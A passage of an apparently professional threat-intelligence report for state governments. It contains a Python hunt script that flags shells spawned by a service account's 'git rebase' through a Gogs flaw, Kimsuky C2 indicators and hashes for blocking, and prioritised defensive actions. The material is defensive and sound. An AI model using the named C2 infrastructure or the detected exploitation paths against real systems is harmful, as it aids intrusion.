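    return event["user"] == user and event["comm"] == "git" and argv[1:2] == ["rebase"]


def rebase_subtree_findings(events, user=GOGS_USER):
    """Rule 1: non-git descendants of a service-account `git rebase`."""
    by_pid, children = build_tree(events)
    findings = []
    for e in events:
        if not _is_rebase(e, user):
            continue
        for pid in descendants(children, e["pid"]):
            child = by_pid[pid]
            if child["comm"] not in REBASE_ALLOWED:
                findings.append({"rule": "rebase_child", "rebase_pid": e["pid"], "pid": pid,
                                 "comm": child["comm"], "cmdline": child["cmdline"]})
    return findings


def account_findings(events, user=GOGS_USER):
    """Rule 2: service-account processes outside the expected set."""
    return [{"rule": "account_process", "pid": e["pid"], "comm": e["comm"], "cmdline": e["cmdline"]}
            for e in events if e["user"] == user and e["comm"] not in ACCOUNT_ALLOWED]


def hunt(events=SAMPLE_EVENTS):
    return rebase_subtree_findings(events) + account_findings(events)


if __name__ == "__main__":
    for f in hunt():
        print(f["rule"], f["pid"], f["comm"], f["cmdline"])
```

<p> Rule 1 is the precise one for this vulnerability class; rule 2 is the cheap backstop that also catches whatever the shell goes on to run, and it stays useful after the Gogs instance is gone for any other service account that should only ever exec a known handful of binaries.
</p>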
<ol start="5"> <li> <strong> Kimsuky IOC Blocking </strong> </li>
</ol>
<ul> <li> Block at network perimeter and DNS: reward.freeddns[.]org, 118.194.248[.]246:443 </li> <li> Deploy hash-based detections: 7af2d954bdcf0bcf149fc91a856cd7c1, 1b1d8c182769b55a2eeeaf3364ac2f3e </li> <li> <strong> ATT&CK: </strong> T1566.001 (Spearphishing), T1204.002 (User Execution: Malicious File) </li>
</ul>
<ol start="6"> <li> <strong> Ransomware Precursor Hunting (PIR-001 — Quiet but Active) </strong> </li>
</ol>
<ul> <li> <strong> Hunt hypothesis: </strong> Rhysida/Qilin/Akira operators are conducting reconnaissance or pre-positioning in state networks without triggering alerts. </li> <li> <strong> Detection: </strong> Hunt for T1078 (Valid Accounts) anomalies — service accounts authenticating from unusual locations. Hunt for T1021.001 (Remote Desktop Protocol) lateral movement during off-hours. Monitor for Veeam credential access (T1003) per Abyss Locker kill chain from prior cycle. </li> <li> <strong> ATT&CK: </strong> T1078, T1021.001, T1003, T1486 (Data Encrypted for Impact) </li>
</ul>
<h3> <strong> IOC Blocking Table </strong>
</h3>
<table> <thead> <tr> <th> <p> <strong> Type </strong> </p> </th> <th> <p> <strong> Value </strong> </p> </th> <th> <p> <strong> Context </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> Domain </p> </td> <td> <p> reward.freeddns[.]org </p> </td> <td> <p> Kimsuky C2 (confidence 89) </p> </td> <td> <p> Block DNS + proxy </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 118.194.248[.]246 </p> </td> <td> <p> Kimsuky C2, port 443 (confidence 82) </p> </td> <td> <p> Block at firewall </p> </td> </tr> <tr> <td> <p> MD5 </p> </td> <td> <p> 7af2d954bdcf0bcf149fc91a856cd7c1 </p> </td> <td> <p> Kimsuky malware (confidence 85) </p> </td> <td> <p> Block at EDR </p> </td> </tr> <tr> <td> <p> MD5 </p> </td> <td> <p> 1b1d8c182769b55a2eeeaf3364ac2f3e </p> </td> <td> <p> Kimsuky malware (confidence 85) </p> </td> <td> <p> Block at EDR </p> </td> </tr> <tr> <td> <p> SHA-256 </p> </td> <td> <p> 3fc06b7da8cf9b90ca33601710fe81e90c95fc2c9aa3a906cf248121738e25b3 </p> </td> <td> <p> Kimsuky malware (confidence 85) </p> </td> <td> <p> Block at EDR </p> </td> </tr> </tbody>
</table>
<p> Additional IOCs for campaigns discussed in this report are available through Anomali ThreatStream Next-Gen and partner feeds.
</p>
<h2> <strong> Sector-Specific Defensive Priorities </strong>
</h2>
<h3> <strong> Financial Services (State Treasury, Revenue, Benefits Systems) </strong>
</h3>
<ul> <li> <strong> Primary threat: </strong> Third-party data processor breaches (Beacon Mutual model). Benefits administrators, payroll processors, and tax filing partners hold state employee and citizen PII. </li> <li> <strong> Action: </strong> Inventory all third-party processors with access to financial PII. Verify breach notification clauses in contracts. Require SOC 2 Type II or equivalent from all processors handling >10,000 records. </li> <li> <strong> Secondary threat: </strong> Kimsuky targeting financial sector with HTTPSpy. Monitor for spoofed meeting invitations (Webex, Teams) targeting finance staff. </li>
</ul>
<h3> <strong> Energy (State-Managed Utilities, Grid Coordination) </strong>
</h3>
<ul> <li> <strong> Primary threat: </strong> ICS/SCADA vulnerabilities (ABB EIBPORT, Schneider EcoStruxure). Volt Typhoon pre-positioning in energy infrastructure (absence is not assurance). </li> <li> <strong> Action: </strong> Segment OT networks from IT. Apply CISA ICS advisory patches (ICSA-26-148 series). Conduct proactive hunt for living-off-the-land binaries (LOLBins) in OT-adjacent networks — Volt Typhoon's signature approach. </li> <li> <strong> Secondary threat: </strong> XCharge C6 EV charging station vulnerabilities — relevant if state manages EV charging infrastructure. </li>
</ul>
<h3> <strong> Healthcare (State Health Agencies, Medicaid Systems) </strong>
</h3>
<ul> <li> <strong> Primary threat: </strong> Kimsuky explicitly targeting healthcare sector. HTTPSpy and HelloDoor deployments confirmed against health organizations. </li> <li> <strong> Action: </strong> Deploy Kimsuky IOCs to all healthcare network segments. Brief clinical IT staff on spoofed security software installers. Monitor for VS Code tunneling from clinical workstations (should never occur). </li> <li> <strong> Secondary threat: </strong> Ransomware groups (Rhysida, Qilin) historically target healthcare for maximum pressure. </li>
</ul>
<h3> <strong> Government (Executive Agencies, Legislative Systems, Courts) </strong>
</h3>
<ul> <li> <strong> Primary threat: </strong> Nation-state espionage — COZY BEAR (Russia), Kimsuky (DPRK), Nimbus Manticore (Iran) all actively targeting government. Supply chain compromise via developer tooling (VS Code, Git). </li> <li> <strong> Action: </strong> Audit all VS Code installations and extensions. Block Kimsuky IOCs. Review OAuth/device code flow configurations in M365 to prevent MFA bypass (COZY BEAR TTP from prior cycle). Verify SonicWall patch status for CVE-2021-20038 (Abyss Locker vector). </li> <li> <strong> Secondary threat: </strong> Beacon Mutual-style breaches via any third-party holding government employee data. </li>
</ul>
<h3> <strong> Aviation / Logistics (State DOT, Airport Authorities, Port Systems) </strong>
</h3>
<ul> <li> <strong> Primary threat: </strong> ICS vulnerabilities in transportation control systems. MacGregor VDR (Voyage Data Recorder) advisory in CISA batch — relevant to port authorities. </li> <li> <strong> Action: </strong> Inventory all ICS/SCADA systems in transportation infrastructure. Apply CISA advisories. Segment operational technology from administrative networks. </li> <li> <strong> Secondary threat: </strong> Supply chain compromise of logistics software via CI/CD pipeline attacks (Nx Console model). </li>
</ul>
<h2> <strong> Prioritized Defense Recommendations </strong>
</h2>
<h3> <strong> IMMEDIATE (Within 24 Hours) </strong>
</h3>
<table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 1 </p> </td> <td> <p> IT Ops </p> </td> <td> <p> <strong> Patch Notepad++ to version 8.9.6.1 on all state developer and admin workstations. CVE-2026-48778 enables RCE via config.xml with low attack complexity and no privileges required. </strong> </p> </td> </tr> <tr> <td> <p> 2 </p> </td> <td> <p> DevOps </p> </td> <td> <p> <strong> Audit all VS Code extensions </strong> across state developer environments for malicious Nx Console variants. Remove any unrecognized or recently-modified extensions. Cross-reference CISA alert when full IOCs publish. </p> </td> </tr> <tr> <td> <p> 3 </p> </td> <td> <p> DevOps </p> </td> <td> <p> <strong> Inventory all Gogs instances </strong> across state agencies. If found: disable rebase merging immediately, restrict to internal-only access, and begin migration planning to a maintained alternative (Gitea, GitLab). There is no patch. </p> </td> </tr> <tr> <td> <p> 4 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Block Kimsuky IOCs </strong> at network perimeter: reward.freeddns[.]org, 118.194.248[.]246:443. Deploy hash-based detections to EDR. </p> </td> </tr> <tr> <td> <p> 5 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Verify SonicWall firewalls </strong> are patched against CVE-2021-20038 (Abyss Locker exploitation vector from prior cycle). </p> </td> </tr> </tbody>
</table>
<h3> <strong> 7-DAY </strong>
</h3>
<table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 6 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Deploy VS Code tunneling detection rule. </strong> Alert on code.exe / code-tunnel processes with persistent outbound connections to *.vscode.dev from non-developer endpoints or machines without VS Code in approved baseline. </p> </td> </tr> <tr> <td> <p> 7 </p> </td> <td> <p> IT Ops / Facilities </p> </td> <td> <p> <strong> Apply firmware updates </strong> to ABB EIBPORT building automation controllers and Schneider EcoStruxure Machine Expert HVAC systems per ICSA-26-148-03 and ICSA-26-148-07. </p> </td> </tr> <tr> <td> <p> 8 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Conduct proactive ransomware precursor hunt. </strong> Search for Rhysida/Qilin/Akira indicators: anomalous service account authentication, off-hours RDP lateral movement, Veeam credential access attempts. </p> </td> </tr> <tr> <td> <p> 9 </p> </td> <td> <p> IAM Team </p> </td> <td> <p> <strong> Review M365 OAuth device code flow </strong> configurations. Restrict to managed devices only to prevent MFA-bypass phishing (COZY BEAR TTP). </p> </td> </tr> <tr> <td> <p> 10 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Develop behavioral detection </strong> for config.xml and shortcuts.xml modification on Notepad++ endpoints — covers future config-based RCE variants. </p> </td> </tr> </tbody>
</table>
<h3> <strong> 30-DAY </strong>
</h3>
<table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 11 </p> </td> <td> <p> CISO </p> </td> <td> <p> <strong> Commission third-party risk assessment </strong> of all benefits providers, workers' comp insurers, pension administrators, and payroll processors holding state employee PII. The Beacon Mutual breach is a template for future incidents. </p> </td> </tr> <tr> <td> <p> 12 </p> </td> <td> <p> CISO / CIO </p> </td> <td> <p> <strong> Establish software bill of materials (SBOM) program </strong> covering developer tooling — not just production dependencies. VS Code extensions, Git services, and CI/CD plugins are now confirmed attack surfaces. </p> </td> </tr> <tr> <td> <p> 13 </p> </td> <td> <p> CISO </p> </td> <td> <p> <strong> Initiate proactive threat hunt </strong> for Volt Typhoon / Salt Typhoon pre-positioning TTPs: living-off-the-land binaries, unusual use of built-in Windows tools (certutil, netsh, wmic), and anomalous network reconnaissance from internal hosts. </p> </td> </tr> <tr> <td> <p> 14 </p> </td> <td> <p> IR Team </p> </td> <td> <p> <strong> Update incident response playbooks </strong> to include supply chain compromise scenarios: malicious VS Code extension, compromised Git repository, and third-party data processor breach. Tabletop exercise recommended. </p> </td> </tr> <tr> <td> <p> 15 </p> </td> <td> <p> CIO </p> </td> <td> <p> <strong> Escalate OSINT collection gap. </strong> The state's threat intelligence capability has operated with degraded open-source collection for 103 consecutive days. This creates a structural blind spot. Procurement of replacement OSINT feeds should be treated as a P0 priority. </p> </td> </tr> </tbody>
</table>
<h2> <strong> Executive Decisions Required </strong>
</h2>
<ol> <li> <strong> Approve emergency Notepad++ patching </strong> — CVE-2026-48778 is low-complexity RCE on a tool deployed across state workstations </li> <li> <strong> Direct Gogs inventory and migration </strong> — zero-day with no patch path; any instance is permanently vulnerable </li> <li> <strong> Initiate third-party risk review </strong> — Beacon Mutual breach proves benefits providers are an unmonitored attack surface for state employee data </li> <li> <strong> Fund OSINT collection replacement </strong> — 103 days of degraded open-source intelligence is an unacceptable structural gap </li>
</ol>
<h2> <strong> Bottom Line </strong>
</h2>
<p> Three supply chain vectors converged in a single 48-hour window. Kimsuky is running nation-state C2 through a tool your developers use every day. A Git service with no patch and no vendor response sits exposed across more than 1,100 internet-facing instances. A benefits insurer you may never have classified as a technology risk has already handed adversaries your employees' PII. None of these threats require a sophisticated attacker to exploit — they require only that defenders delay action.
</p>
<p> The 24-hour recommendations in this report require no budget approval and no architectural changes. Patch Notepad++. Audit VS Code extensions. Find and isolate every Gogs instance. Block the Kimsuky IOCs. These actions close the most immediate exposure windows before adversaries move from reconnaissance to exploitation.
</p>
<p> The 30-day recommendations address the structural conditions that made this week's convergence possible: an unmeasured third-party risk surface, no SBOM discipline for developer tooling, and a degraded OSINT collection capability that has persisted for over three months. Fixing those conditions is what prevents the next convergence.
</p>
<h2> <strong> Closing </strong>
</h2>
<p> The convergence of three supply chain vectors in 48 hours — malicious IDE extensions, unpatched source code management, and third-party data processor breaches — signals a fundamental shift in how state government attack surfaces are defined. Your perimeter is no longer your network boundary. It extends to every developer's VS Code installation, every self-hosted Git instance buried in an agency's infrastructure, and every insurance company that holds your employees' Social Security numbers.
</p>
<p> Kimsuky's adoption of VS Code tunneling means that a legitimate Microsoft tool, generating legitimate-looking Microsoft traffic, is now a confirmed nation-state C2 channel. Traditional network monitoring will not catch this. The Gogs zero-day means that "self-hosted for security" may now mean "permanently vulnerable with no remediation." And the Beacon Mutual breach means your third-party risk program needs to extend far beyond technology vendors.
</p>
<p> The actions outlined above are specific, prioritized, and time-bound. The 24-hour items — patching Notepad++, auditing VS Code extensions, inventorying Gogs, and blocking Kimsuky IOCs — require no budget approval and no architectural changes. They require only the decision to act today rather than tomorrow.
</p>
<p> Tomorrow's threat landscape will not wait for next quarter's planning cycle.
</p>
<p> <em> Anomali CTI Desk | 29 May 2026 | TLP:GREEN </em>
</p>
<p> <em> This intelligence is assessed as shareable within the state government community and peer organizations. </em>
</p>